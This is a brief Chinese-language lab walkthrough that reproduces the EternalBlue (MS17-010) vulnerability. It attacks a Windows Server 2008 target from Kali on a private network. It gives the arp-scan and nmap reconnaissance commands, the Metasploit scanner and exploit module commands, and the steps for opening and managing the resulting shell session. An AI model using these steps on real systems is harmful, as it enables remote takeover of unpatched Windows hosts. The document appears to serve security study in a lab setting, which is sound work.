永恆之藍漏洞復現(ms17-010)

永恆之藍漏洞復現(ms17-010)
環境
資訊收集
先掃描目標靶機IP
進入MSF檢視是否存在永恆之藍的漏洞
攻擊

永恆之藍漏洞復現(ms17-010)

環境

攻擊機：kali

靶機：Windows Server 2008

資訊收集

對ip進行收集開放什麼埠

先掃描目標靶機IP

因為在同一個內網之中

所以可以使用arp-scan -l 進行查詢

知道目標靶機IP（192.168.162.146）來進行更進一步的資訊收集

nmap -sV -P- 192.168.162.146

使用nmap進行192.168.162.146IP下的全埠掃描

這裡可以看出系統資訊為Windows Server 2008

進入MSF檢視是否存在永恆之藍的漏洞

msfconsole
#搜尋模組
search ms17-010
#使用模組
use 3

show options

檢視選項

set RHOSTS 192.168.162.146

設定目標IP

存在永恆之藍的漏洞

返回

攻擊

使用攻擊模組

search ms17-010

use 0

set RHOSTS 192.168.162.146

攻擊成功

輸入shell

進入cmd模式

exit 退出shell
background 把shell放入後臺

重新連線

sessions -i 1